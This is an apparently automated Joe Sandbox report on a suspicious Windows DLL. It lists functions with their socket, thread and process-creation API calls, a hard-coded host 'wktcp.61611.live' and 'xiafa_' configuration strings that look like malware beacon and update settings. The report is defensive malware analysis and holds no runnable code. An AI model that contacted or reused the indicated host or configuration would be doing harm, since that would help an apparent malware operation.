Instruction ID: c6297489b9343aa14daceb2b23b854b15629787c9eaf3216ec455666ea5a6765
Opcode Fuzzy Hash: 8f174c59e55ee46aa1a0518bf9910ef7bcc233a2a1d8cc6bb2ecf2f82cef4e6c
Instruction Fuzzy Hash: 2DF0DA76900649AFDF01CFE8C801ADEB7B1FF48354F004425EA01E3211D7399A149BA5

Function 10009005 Relevance: 1.5, APIs: 1, Instructions: 27COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000900A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 082614ae51f8eaab92f8fd4fcbd49f14c1e35ad109d2f292faef18787c312c3c
Instruction ID: d8b04152d89935f80a21dc8e5be05f0eecfdb8387a64987abe8c677b8d63aa7e
Opcode Fuzzy Hash: 082614ae51f8eaab92f8fd4fcbd49f14c1e35ad109d2f292faef18787c312c3c
Instruction Fuzzy Hash: 82F0F2B6A04649AFEB01CFA8C501ADEB7B5EB08314F104466E901F7261D735AE158B66

Function 1001A146 Relevance: 1.5, APIs: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1001A17E

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 2c2698d9046910f35f71d844e2ee760e71884a89bdce3fdce241900a1686537b
Instruction ID: 36140bd552ea7598696e433675d61f7601ae88bce914a68567ec45485bf916f3
Opcode Fuzzy Hash: 2c2698d9046910f35f71d844e2ee760e71884a89bdce3fdce241900a1686537b
Instruction Fuzzy Hash: BCF0D4B190AB908FC378CF29A541203FBE0AB187107108E2FE0EAC7B80D3B0A444CF58

Function 1001E093 Relevance: 1.5, APIs: 1, Instructions: 24threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,1001C9A2,?,00000000,00000000), ref: 1001E0C3

Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1BD
Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1C8
Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1D4
Part of subcall function 1001E1A7: Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
Part of subcall function 1001E1A7: Sleep.KERNELBASE ref: 1001E26F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: SleepThread$CloseHandleTerminate$closesocket$Create
String ID:
API String ID: 4110853011-0
Opcode ID: 087594ae852631b1769bd4bec608cb617506a2bc0a30da82affd88f2c824ebc1
Instruction ID: 6a280082d855df33ede7dbe1d76fd2287fd5124dc276dd059ab29f99ddadefcf
Opcode Fuzzy Hash: 087594ae852631b1769bd4bec608cb617506a2bc0a30da82affd88f2c824ebc1
Instruction Fuzzy Hash: 34E04874406BD16DF362D235894876B6ECCDF45354F45146DE483C7942D6B4FCC48761

Function 1001A1AC Relevance: 1.5, APIs: 1, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 1001A1BE

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: c4f720c0c7b723e6038e199acd1e74adfd93ace1d065f47373bb1268fbd76b58
Instruction ID: 93ea723e0ff4a37ebefb55af8edc70bf2818af01715938430097f1e814cd421c
Opcode Fuzzy Hash: c4f720c0c7b723e6038e199acd1e74adfd93ace1d065f47373bb1268fbd76b58
Instruction Fuzzy Hash: 80E0B635040B10DED335DA14D4517EAB7E0EF14355F10881ED083068959BB5B4898B40

Function 10033C98 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 10033CA3

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
Instruction ID: 13b5a6f81be809b2fbf7d3c091e96eb276c097e301d156e73de4e88552a403f5
Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
Instruction Fuzzy Hash: 60B0927654020C7BDE021E82EC02B49BB199B40665F008020FB0C1C261AA73A6A09689

Function 1000D52D Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000064), ref: 1000D543

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3dcde9034596774b65aa007e54195beb177a1c6bf47b1e63de3ded5947083681
Instruction ID: 41bad7438e7423b750e1fa2d8fabe618bb1bd2ce65775e71a8698d2292646254
Opcode Fuzzy Hash: 3dcde9034596774b65aa007e54195beb177a1c6bf47b1e63de3ded5947083681
Instruction Fuzzy Hash: 6BD0A53151491457F714A775DC0669E339CD700255F000356FC55531D4DF707D50C6D5

Non-executed Functions

Function 1001D91A Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 198networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000002,00000011), ref: 1001D950
WSAGetLastError.WS2_32 ref: 1001D95D
htons.WS2_32(?), ref: 1001D97D
htonl.WS2_32(00000000), ref: 1001D98A
setsockopt.WS2_32 ref: 1001D9B4
setsockopt.WS2_32(00000000,0000FFFF,00001006,00001005,00000004), ref: 1001D9C8
bind.WS2_32(00000000,?,00000010), ref: 1001D9D4
recvfrom.WS2_32(00000000,?,00000400,00000000,?,?), ref: 1001DAB3
WSAGetLastError.WS2_32(?,?,?), ref: 1001DABE

Strings

hres, xrefs: 1001DA3F, 1001DA44, 1001DA54
ccht, xrefs: 1001DB23, 1001DB2F
hreq, xrefs: 1001DA1B, 1001DA27
IP:%s ==Recv: %s, xrefs: 1001DADC

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLastsetsockopt$bindhtonlhtonsrecvfromsocket
String ID: IP:%s ==Recv: %s$ccht$hreq$hres
API String ID: 1368703699-1797924724
Opcode ID: 1c73bfb027f7b528c638a0258346ea694c6c635403ffc744a9e401bed086363c
Instruction ID: 8a38a5ddf07dcaa12e81e06f12ca4663fe6f1a20b86c72e49e58aede4ad143c3
Opcode Fuzzy Hash: 1c73bfb027f7b528c638a0258346ea694c6c635403ffc744a9e401bed086363c
Instruction Fuzzy Hash: E76180B1108381BEE310EB64CC85FEB7BE8EF44750F50491AF686960D1EB70E948C762

Function 10022490 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 128networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 100224D7
ioctlsocket.WS2_32(?,8004667E,?), ref: 10022520
bind.WS2_32(?,00000002,0000001C), ref: 10022540
SetLastError.KERNEL32(00000000), ref: 10022551
listen.WS2_32(?,?), ref: 1002256F
WSAGetLastError.WS2_32 ref: 100225A7
GetLastError.KERNEL32 ref: 100225C5
SetLastError.KERNEL32 ref: 100225DD

Strings

0.0.0.0, xrefs: 100224A5
CTcpServer::CreateListenSocket, xrefs: 100225AE

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast$bindioctlsocketlistensocket
String ID: 0.0.0.0$CTcpServer::CreateListenSocket
API String ID: 2417606085-4023130488
Opcode ID: f9bfeb4a8cc739fafcd06cefcd0780e203ae39d7abe803c851bd641ea0665de6
Instruction ID: 0924c4b3d37fc36c10ea38e20b5c0763d1d4709caa76c9637eac185a656b50da
Opcode Fuzzy Hash: f9bfeb4a8cc739fafcd06cefcd0780e203ae39d7abe803c851bd641ea0665de6
Instruction Fuzzy Hash: 4F41B170500714AFE710EFB4E849B6BB7E9FF44305F40891EF846C6690EB75A814CB91

Function 10012D83 Relevance: 23.1, APIs: 2, Strings: 11, Instructions: 337COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10012D88

Strings

wktcp.61611.live, xrefs: 10012F86, 10012FA0
xiafa_master_max_time, xrefs: 100130D8, 100130F7
xiafa_heart_limit, xrefs: 10012E1B, 10012E3A
xiafa_open_win_bfe, xrefs: 100131A7
xiafa_client_min_num, xrefs: 10012ECE, 10012EEC
xiafa_th_cnd_url_parm, xrefs: 10013018, 10013037
xiafa_th_cnd_url_host, xrefs: 10012FB8, 10012FD7
xiafa_heart_times, xrefs: 10012E75, 10012E93
xiafa_wktcp_uri, xrefs: 10012F27, 10012F45
xiafa_file_src, xrefs: 10013078, 10013097
xiafa_upd_port, xrefs: 1001313E, 1001315D

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: wktcp.61611.live$xiafa_client_min_num$xiafa_file_src$xiafa_heart_limit$xiafa_heart_times$xiafa_master_max_time$xiafa_open_win_bfe$xiafa_th_cnd_url_host$xiafa_th_cnd_url_parm$xiafa_upd_port$xiafa_wktcp_uri
API String ID: 3519838083-3019661151
Opcode ID: c26cc2e2d9724cc705b00cacf4f18eb540fd175cc3d86ff227f7b714cb0e39ed
Instruction ID: e84b3c3617c25484063252d4129af66106cac9c9e1bb229d2fa69548bda7719b
Opcode Fuzzy Hash: c26cc2e2d9724cc705b00cacf4f18eb540fd175cc3d86ff227f7b714cb0e39ed
Instruction Fuzzy Hash: 04C19275D00219AFDB05DBA0D851AEEB3F9EF05390F118139E956AF184DB35BE84CB90

Function 1004AF6D Relevance: 13.7, APIs: 9, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC

_TranslateName.LIBCMT ref: 1004AFEE
_TranslateName.LIBCMT ref: 1004B039
GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 1004B086

Part of subcall function 1003B2C3: _wcsnlen.LIBCMT ref: 1003B304

IsValidCodePage.KERNEL32(00000000), ref: 1004B0DA
IsValidLocale.KERNEL32(?,00000001), ref: 1004B0ED
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 1004B140
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1004B157
__itow_s.LIBCMT ref: 1004B169

Part of subcall function 1004C3C8: _xtow_s@20.LIBCMT ref: 1004C3EA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Locale$InfoNameTranslateValid$CodeDefaultPageUser__amsg_exit__getptd_noexit__itow_s_wcsnlen_xtow_s@20
String ID:
API String ID: 199814687-0
Opcode ID: 39c6e4449ea84833ae254ba338725754464b4196201b929d1c5f82d3ae26f83a
Instruction ID: 4fc6a9a088543b0316f59e72052d6279c4d4c9207a0cb4644f24b7b142753181
Opcode Fuzzy Hash: 39c6e4449ea84833ae254ba338725754464b4196201b929d1c5f82d3ae26f83a
Instruction Fuzzy Hash: E7518171900619DEDB50EFA4CC81AAE73F8EF05341F614575E910EB191EB70EA44CBA9

Function 1001060E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 68processCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10010613
CreateProcessAsUserA.ADVAPI32(00000010,00000000,00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,?,?), ref: 10010699
CloseHandle.KERNEL32(00000010,?,?,?,?,explorer.exe,00000000,?), ref: 100106A4
GetLastError.KERNEL32(?,?,?,?,explorer.exe,00000000,?), ref: 100106AE

Strings

explorer.exe, xrefs: 1001062B
%s %s, xrefs: 1001066B
D, xrefs: 10010651

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseCreateErrorH_prologHandleLastProcessUser
String ID: %s %s$D$explorer.exe
API String ID: 421470672-2019813861
Opcode ID: 9c2971f4b1e3e1582cbd7f665ca8fac21aa31e3dea3450054789c647ec5f8b82
Instruction ID: 778f5603c8327821afb563841f716112cfeaecf5831ac6f29751f1640c43d1c5
Opcode Fuzzy Hash: 9c2971f4b1e3e1582cbd7f665ca8fac21aa31e3dea3450054789c647ec5f8b82
Instruction Fuzzy Hash: 8F117FB690021CBFEB00DFA4CD85EEE7BACEF04294F008515F945AA291DB709E04CBA4

Function 1000E971 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107sleepCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1000E9D4

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

Sleep.KERNEL32(000003E8,?,?,00000017,00000000,1005C7F0), ref: 1000E9F1
__time64.LIBCMT ref: 1000EA93
Sleep.KERNEL32(00000000), ref: 1000EA9A
__time64.LIBCMT ref: 1000EAA2

Part of subcall function 10011030: __EH_prolog.LIBCMT ref: 10011035
Part of subcall function 10011030: htonl.WS2_32(?), ref: 10011095
Part of subcall function 10011030: htonl.WS2_32(?), ref: 1001109D
Part of subcall function 10011030: __time64.LIBCMT ref: 100110A3
Part of subcall function 10011030: htonl.WS2_32(00000000), ref: 100110AC

Strings

AB..$@#$$%DD55612, xrefs: 1000EA37

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: __time64$htonl$SleepTime$FileH_prologSystem__aulldiv
String ID: AB..$@#$$%DD55612
API String ID: 1238321497-162139447
Opcode ID: c5b1bcb94f28a798ca7a47e2918505f1331daa4b3c8216bc08fc67e608227841
Instruction ID: 6a13c054f4f04c6358b3622b4e0ec507bf56ad0f77e34106ffcfd99f1ea0ae15
Opcode Fuzzy Hash: c5b1bcb94f28a798ca7a47e2918505f1331daa4b3c8216bc08fc67e608227841
Instruction Fuzzy Hash: C241A5759002409FEB05DF69C88679D7BB0FF49350F1001ADE8056F28BDB70AA40CBD1

Function 1004AE58 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 1004AE6F
_wcscmp.LIBCMT ref: 1004AE80
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,1004B0B2,?,00000000), ref: 1004AE9C
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,1004B0B2,?,00000000), ref: 1004AEC6

Strings

ACP, xrefs: 1004AE69
OCP, xrefs: 1004AE7A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 96948872a54df117caa813e5fff25adf86b5ae832d325085f2e4dd0d3cbf57d0
Instruction ID: 7ca6b2f6a5d94109592f4c6cab96a781578c81931e1403feef7af7114684b216
Opcode Fuzzy Hash: 96948872a54df117caa813e5fff25adf86b5ae832d325085f2e4dd0d3cbf57d0
Instruction Fuzzy Hash: EC01523520451AAEE700DE66DC85ECA37D8EF066A5F218036FA15DA051E730EDC08798

Function 1000FBB2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98sleepCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1000FBB4

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

__time64.LIBCMT ref: 1000FCAB
Sleep.KERNEL32(00000000), ref: 1000FCB2
__time64.LIBCMT ref: 1000FCBA

Part of subcall function 10011030: __EH_prolog.LIBCMT ref: 10011035
Part of subcall function 10011030: htonl.WS2_32(?), ref: 10011095
Part of subcall function 10011030: htonl.WS2_32(?), ref: 1001109D
Part of subcall function 10011030: __time64.LIBCMT ref: 100110A3
Part of subcall function 10011030: htonl.WS2_32(00000000), ref: 100110AC

Part of subcall function 10015F50: __EH_prolog.LIBCMT ref: 10015F55

Strings

AB..$@#$$%DD55612, xrefs: 1000FC4F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

